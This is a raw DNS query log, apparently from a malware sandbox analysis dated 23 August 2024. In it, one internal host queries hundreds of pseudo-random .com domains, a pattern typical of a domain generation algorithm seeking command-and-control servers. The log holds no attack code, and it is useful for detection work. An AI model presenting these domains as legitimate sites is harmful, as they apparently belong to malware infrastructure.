                                                                                                                                                                                                              Aug 23, 2024 18:48:57.763761997 CEST192.168.2.41.1.1.10xd728Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.837583065 CEST192.168.2.41.1.1.10x53b2Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.838190079 CEST192.168.2.41.1.1.10xe7caStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.838392019 CEST192.168.2.41.1.1.10x5004Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.838807106 CEST192.168.2.41.1.1.10xf935Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.839296103 CEST192.168.2.41.1.1.10xb591Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.839483976 CEST192.168.2.41.1.1.10xa711Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.839859962 CEST192.168.2.41.1.1.10x1e31Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.840145111 CEST192.168.2.41.1.1.10xedf1Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.841301918 CEST192.168.2.41.1.1.10x21d1Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.847120047 CEST192.168.2.41.1.1.10x5097Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.847403049 CEST192.168.2.41.1.1.10x1433Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.851294994 CEST192.168.2.41.1.1.10xbec1Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.851603031 CEST192.168.2.41.1.1.10x3241Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.851784945 CEST192.168.2.41.1.1.10x65e2Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.855057001 CEST192.168.2.41.1.1.10xdb3dStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.855210066 CEST192.168.2.41.1.1.10xb2f1Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.855385065 CEST192.168.2.41.1.1.10x1e56Standard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.855525970 CEST192.168.2.41.1.1.10x56fStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.859194994 CEST192.168.2.41.1.1.10x9697Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.859404087 CEST192.168.2.41.1.1.10x62a9Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.863065004 CEST192.168.2.41.1.1.10x921dStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.863277912 CEST192.168.2.41.1.1.10xaca5Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.871063948 CEST192.168.2.41.1.1.10xa4fbStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.871243954 CEST192.168.2.41.1.1.10x8dc9Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.882921934 CEST192.168.2.41.1.1.10x2fc3Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.883125067 CEST192.168.2.41.1.1.10xcfaStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.883280039 CEST192.168.2.41.1.1.10x2067Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.883424997 CEST192.168.2.41.1.1.10x6325Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.894892931 CEST192.168.2.41.1.1.10x71ceStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.898215055 CEST192.168.2.41.1.1.10x7960Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.898442984 CEST192.168.2.41.1.1.10xc28bStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.898585081 CEST192.168.2.41.1.1.10xaaaStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.906017065 CEST192.168.2.41.1.1.10xd6d1Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.906232119 CEST192.168.2.41.1.1.10x56eeStandard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.906397104 CEST192.168.2.41.1.1.10xb474Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.906539917 CEST192.168.2.41.1.1.10x451eStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.910068989 CEST192.168.2.41.1.1.10xbf17Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.910201073 CEST192.168.2.41.1.1.10x5190Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.910339117 CEST192.168.2.41.1.1.10x1b87Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.914144993 CEST192.168.2.41.1.1.10xfdfbStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.914334059 CEST192.168.2.41.1.1.10x2a36Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.914483070 CEST192.168.2.41.1.1.10x979Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.914609909 CEST192.168.2.41.1.1.10xe481Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.918370008 CEST192.168.2.41.1.1.10x13d0Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.918540001 CEST192.168.2.41.1.1.10x7e4aStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.922507048 CEST192.168.2.41.1.1.10x52e3Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.922621012 CEST192.168.2.41.1.1.10x8323Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.926162958 CEST192.168.2.41.1.1.10xeabfStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.926629066 CEST192.168.2.41.1.1.10x165eStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.930525064 CEST192.168.2.41.1.1.10x6de8Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.930731058 CEST192.168.2.41.1.1.10xc7Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.934431076 CEST192.168.2.41.1.1.10xcc6bStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.934629917 CEST192.168.2.41.1.1.10x271cStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.934792042 CEST192.168.2.41.1.1.10xfc95Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.938487053 CEST192.168.2.41.1.1.10xfa98Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.938776016 CEST192.168.2.41.1.1.10x1714Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.072338104 CEST192.168.2.41.1.1.10xc2b6Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.110388041 CEST192.168.2.41.1.1.10x2610Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.138926983 CEST192.168.2.41.1.1.10xdaa9Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.139354944 CEST192.168.2.41.1.1.10x6f16Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.145874977 CEST192.168.2.41.1.1.10xa2ebStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.146394014 CEST192.168.2.41.1.1.10xa8f5Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.147366047 CEST192.168.2.41.1.1.10xe16dStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.162859917 CEST192.168.2.41.1.1.10xf744Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.177238941 CEST192.168.2.41.1.1.10x297aStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.361932993 CEST192.168.2.41.1.1.10x376cStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.368675947 CEST192.168.2.41.1.1.10xff7Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369178057 CEST192.168.2.41.1.1.10xd6f2Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369748116 CEST192.168.2.41.1.1.10x46a3Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.369957924 CEST192.168.2.41.1.1.10x5318Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370162964 CEST192.168.2.41.1.1.10xc569Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370496035 CEST192.168.2.41.1.1.10x6f89Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.370800018 CEST192.168.2.41.1.1.10x126aStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371210098 CEST192.168.2.41.1.1.10x4945Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371382952 CEST192.168.2.41.1.1.10x1a06Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.371784925 CEST192.168.2.41.1.1.10x7614Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.372275114 CEST192.168.2.41.1.1.10xbe1Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.372477055 CEST192.168.2.41.1.1.10x1abfStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380325079 CEST192.168.2.41.1.1.10x82c7Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380562067 CEST192.168.2.41.1.1.10xdd72Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.380748987 CEST192.168.2.41.1.1.10x6f0cStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.383908033 CEST192.168.2.41.1.1.10x8299Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384160995 CEST192.168.2.41.1.1.10x662eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384596109 CEST192.168.2.41.1.1.10x746eStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.384754896 CEST192.168.2.41.1.1.10xaf4dStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.385205984 CEST192.168.2.41.1.1.10xbea3Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.392108917 CEST192.168.2.41.1.1.10xe9adStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.392283916 CEST192.168.2.41.1.1.10xc933Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.395801067 CEST192.168.2.41.1.1.10xf1bfStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396183968 CEST192.168.2.41.1.1.10x7abStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396503925 CEST192.168.2.41.1.1.10x1750Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396709919 CEST192.168.2.41.1.1.10x8ef2Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396785021 CEST192.168.2.41.1.1.10x33efStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.396939039 CEST192.168.2.41.1.1.10xe05dStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397111893 CEST192.168.2.41.1.1.10xebd8Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397212029 CEST192.168.2.41.1.1.10xc813Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397265911 CEST192.168.2.41.1.1.10xcf2Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397413969 CEST192.168.2.41.1.1.10xbcfaStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397499084 CEST192.168.2.41.1.1.10xdb0Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397638083 CEST192.168.2.41.1.1.10xc266Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.397809029 CEST192.168.2.41.1.1.10xaf4fStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.398241997 CEST192.168.2.41.1.1.10x2e18Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.398794889 CEST192.168.2.41.1.1.10xbe70Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.400311947 CEST192.168.2.41.1.1.10x70d1Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.402174950 CEST192.168.2.41.1.1.10xd160Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.404745102 CEST192.168.2.41.1.1.10x5128Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.406524897 CEST192.168.2.41.1.1.10x5eceStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.456187963 CEST192.168.2.41.1.1.10xd220Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.464576006 CEST192.168.2.41.1.1.10xe0fdStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.545851946 CEST192.168.2.41.1.1.10x19a3Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.557746887 CEST192.168.2.41.1.1.10xa02fStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.634027958 CEST192.168.2.41.1.1.10x64a3Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.324592113 CEST192.168.2.41.1.1.10x40c2Standard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.388036966 CEST192.168.2.41.1.1.10x70d1Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.292578936 CEST192.168.2.41.1.1.10xb898Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293339014 CEST192.168.2.41.1.1.10x38c7Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293385029 CEST192.168.2.41.1.1.10xfedStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293971062 CEST192.168.2.41.1.1.10x3dd5Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.293971062 CEST192.168.2.41.1.1.10x1abaStandard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.294676065 CEST192.168.2.41.1.1.10x6425Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.295011044 CEST192.168.2.41.1.1.10x2b53Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.295671940 CEST192.168.2.41.1.1.10xfe34Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.296260118 CEST192.168.2.41.1.1.10x96f2Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.296848059 CEST192.168.2.41.1.1.10x7154Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.297442913 CEST192.168.2.41.1.1.10xc46aStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.298099995 CEST192.168.2.41.1.1.10xf53eStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.298651934 CEST192.168.2.41.1.1.10x8521Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.299210072 CEST192.168.2.41.1.1.10x98c9Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.299808025 CEST192.168.2.41.1.1.10x7691Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.300384998 CEST192.168.2.41.1.1.10xd76eStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.300954103 CEST192.168.2.41.1.1.10x29c4Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.301500082 CEST192.168.2.41.1.1.10x39e3Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.302083015 CEST192.168.2.41.1.1.10xc375Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.302737951 CEST192.168.2.41.1.1.10x9a8bStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303232908 CEST192.168.2.41.1.1.10xd1f0Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303584099 CEST192.168.2.41.1.1.10xcab4Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.303690910 CEST192.168.2.41.1.1.10x6cbbStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304171085 CEST192.168.2.41.1.1.10x2832Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304389000 CEST192.168.2.41.1.1.10xb9b7Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.304903984 CEST192.168.2.41.1.1.10xb349Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.305392027 CEST192.168.2.41.1.1.10x37e6Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.305891991 CEST192.168.2.41.1.1.10x8f49Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.306343079 CEST192.168.2.41.1.1.10x8432Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.306777954 CEST192.168.2.41.1.1.10xa1daStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.307290077 CEST192.168.2.41.1.1.10xf7faStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.307761908 CEST192.168.2.41.1.1.10x7426Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.308258057 CEST192.168.2.41.1.1.10xc0f2Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.308737040 CEST192.168.2.41.1.1.10x4847Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.309158087 CEST192.168.2.41.1.1.10xdf6cStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.309710979 CEST192.168.2.41.1.1.10xd923Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.310223103 CEST192.168.2.41.1.1.10xba52Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.310722113 CEST192.168.2.41.1.1.10xa376Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.311157942 CEST192.168.2.41.1.1.10x5cd7Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.311661959 CEST192.168.2.41.1.1.10xa207Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.312134027 CEST192.168.2.41.1.1.10x1663Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.312629938 CEST192.168.2.41.1.1.10x795fStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313049078 CEST192.168.2.41.1.1.10x8d4cStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313491106 CEST192.168.2.41.1.1.10x1380Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.313987970 CEST192.168.2.41.1.1.10x617fStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.314469099 CEST192.168.2.41.1.1.10x6bf2Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315025091 CEST192.168.2.41.1.1.10x3c05Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315846920 CEST192.168.2.41.1.1.10x612eStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.315887928 CEST192.168.2.41.1.1.10x792fStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316608906 CEST192.168.2.41.1.1.10x8ec8Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.316838980 CEST192.168.2.41.1.1.10x8bd8Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317074060 CEST192.168.2.41.1.1.10xf988Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.317723036 CEST192.168.2.41.1.1.10xd9e1Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.318325043 CEST192.168.2.41.1.1.10x6e16Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.319879055 CEST192.168.2.41.1.1.10x5bedStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320058107 CEST192.168.2.41.1.1.10xddb0Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320266962 CEST192.168.2.41.1.1.10xb5cfStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320403099 CEST192.168.2.41.1.1.10xed7aStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320579052 CEST192.168.2.41.1.1.10xd3b3Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320715904 CEST192.168.2.41.1.1.10x2b10Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.320858955 CEST192.168.2.41.1.1.10x26a3Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321003914 CEST192.168.2.41.1.1.10x3e00Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321187973 CEST192.168.2.41.1.1.10xd070Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.321337938 CEST192.168.2.41.1.1.10x6867Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.362685919 CEST192.168.2.41.1.1.10x4e75Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.482508898 CEST192.168.2.41.1.1.10x2601Standard query (0)pupycag.comA (IP address)IN (0x0001)false
